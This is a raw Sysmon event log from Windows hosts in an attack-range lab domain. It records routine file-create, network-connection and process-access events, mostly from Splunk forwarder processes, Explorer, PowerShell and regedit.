AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0B3DAC3257B90248045FD918D96214C6,SHA256=8D9EC7B569636414B169A79F0F5731830C08D988B9523BF2B5893C00CE0E1E1D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054214Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:15.557{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AFC2C793C9759B1F89DBD492200FCB3C,SHA256=6179FF170D787FC72901EF94FDFB44FA1AA7E364EA422E929391F7D4FAC750EE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054213Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:15.520{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F149DFA1ACB1B547A482889972EB609,SHA256=CD28329D7E3BC4F0160BE2DAC13F4DCAB8536DE8DD7BFD5F7F66E39822875DE1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810075Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:16.626{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E028D214733F10FAEC9AEF12FD79347,SHA256=AF56FF291A5ECC08C4090F17CD8253348AB3FB22F05303FB221ABFA38D705AE0,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054220Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:08.064{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local61945-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 354300x80000000000000001054219Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:08.064{466BC892-02BC-60E8-2600-00000000CF01}2864C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local61945-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 23542300x80000000000000001054218Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:16.538{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=71F6326D6881D66B75D8CFEC864688C9,SHA256=0C95B7963E6118780F35920B09B49450A5A7C82F76C7AF52AA99208EC8BB16C6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054222Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:17.557{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=70D34F55A64EB79348350AA48704ECF0,SHA256=77B2FA0FF304092BFAB521DE6C177D3446EF42E09A5A9EDC4247858EF899A74D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810077Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:15.307{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57443-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000810076Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:17.626{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2DFF3E512E71FC770B50C1A3D83E66B2,SHA256=15F36526C69EE53F128DDDA382D24EC4C8CB78D32791A5BBDAA4A6AD8F727592,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054221Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:08.686{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61946-false10.0.1.12-8000- 23542300x80000000000000001054224Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:18.572{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B07BD8F27D9C77FC5533A05A65FD2118,SHA256=61D4AC90791BC9A2989D4FBB00E0F7068B44DA998380036A646345F7347B0A24,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810078Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:18.641{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8FE2111D924B8FC8D244A34596278126,SHA256=C8370F3115F6BCF64A0BEEDACBE209E4B7D21D0980192EC8BCB49556482EFECF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054223Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:18.519{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810079Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:19.641{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A369228133B84058A3EC1B9CF7D9EFE3,SHA256=D7A2B5BFB7CED32D5357FB53ACDEEC6569FE73DAC0396685FDD081029E8564BE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054231Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:19.920{466BC892-32D3-60E8-770B-00000000CF01}63569904C:\Windows\Explorer.EXE{466BC892-5441-60E8-FA0F-00000000CF01}7396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+1728d|C:\Windows\System32\SHELL32.dll+61c70|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054230Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:19.920{466BC892-32D3-60E8-770B-00000000CF01}63569904C:\Windows\Explorer.EXE{466BC892-5441-60E8-FA0F-00000000CF01}7396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054229Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:19.905{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-5441-60E8-FB0F-00000000CF01}8412C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+622c0|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054228Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:19.905{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-5441-60E8-FB0F-00000000CF01}8412C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47c90|C:\Windows\System32\SHELL32.dll+6227c|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054227Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:19.905{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-5441-60E8-FB0F-00000000CF01}8412C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62250|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054226Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:19.905{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-5441-60E8-FB0F-00000000CF01}8412C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001054225Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:19.574{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=844175AC0F3B91A51E5A34A0F21C5ED7,SHA256=2F5B934C021872AA85F9F9E75AC98BF4EA97F3B7ED5894ABE22DB0CA558B9147,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810081Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:20.829{0C1E0330-050B-60E8-9B00-00000000D001}1020NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810080Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:20.673{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0B7F56529B4F137D27EC2D517BB53F53,SHA256=6F85A6695E6F52B168C655317FEF6B124D6EEB9FCCA54D526F06D267B2A1B80D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054232Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:20.588{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A39617AD37C55C363E55F9D9E4EC13F6,SHA256=28F0015ED0B81A77B1D7AA0963510E365A84026BBDBFD4D05EBD492BADFBB575,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054235Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:21.921{466BC892-32D3-60E8-770B-00000000CF01}63569904C:\Windows\Explorer.EXE{466BC892-F6B5-60EB-A97D-00000000CF01}1616C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054234Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:21.921{466BC892-32D3-60E8-770B-00000000CF01}63569904C:\Windows\Explorer.EXE{466BC892-F6B5-60EB-A97D-00000000CF01}1616C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001054233Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:21.589{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E0C029906FCB22B6E5203EA11BF56E2C,SHA256=E8A72F80A54B96075362D44288B31924CF761377A5D563CA1026220D214B52F4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810082Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:21.688{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C82E192EE0C735400ED1094AA46F3586,SHA256=7037E767D7ADD15009F4FEBD3B646202B4858AF81C6CB2A2B90F4CCA8A797AF3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054238Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:22.920{466BC892-32D3-60E8-770B-00000000CF01}63569904C:\Windows\Explorer.EXE{466BC892-F7DB-60EB-DC7D-00000000CF01}4252C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001054237Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:14.663{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61947-false10.0.1.12-8000- 23542300x80000000000000001054236Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:22.605{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=017F01DBBDCCD31ECB7A30CDDCC1B55B,SHA256=78037BD0D7502666095A98E9B202DA3301F77E7F051B8EA432B3346723F0E916,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810084Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:22.766{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=309C5C2FD5BFE0410195B9C949142525,SHA256=1BD5DECA9C7908B47B4D75F0C1EBC655063BE09C276907BD7EEDDBEF8C71BC86,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810083Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:20.963{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57444-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x8000000000000000810086Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:23.829{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CA41CF1827ACC36E939B09E75E17941C,SHA256=F5F404A6181967F2D7A66AD2AC375A398FED9F6E8432ED823385DDA69309E4DB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054242Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:23.989{466BC892-32D3-60E8-770B-00000000CF01}63569904C:\Windows\Explorer.EXE{466BC892-F6B5-60EB-A97D-00000000CF01}1616C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054241Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:23.989{466BC892-32D3-60E8-770B-00000000CF01}63569904C:\Windows\Explorer.EXE{466BC892-F6B5-60EB-A97D-00000000CF01}1616C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001054240Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:23.957{466BC892-F7DB-60EB-DC7D-00000000CF01}4252ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-InteractiveMD5=5EF2E2A54532F329FE4B0E510706DA92,SHA256=9A1681E1F311D3204823DF2868E6B56D99A019D2EA79C92CF41688C2DF220B95,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054239Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:23.620{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=015F5EA071D626C461AFE149DD0635A6,SHA256=61EF32EF07195B44BE619E2CA8BD8803CB9326C99133647FCA59E9909CEA89B7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810085Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:21.228{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57445-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000810114Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:24.985{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F800-60EB-D679-00000000D001}3420C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810113Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:24.985{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810112Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:24.985{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810111Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:24.985{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 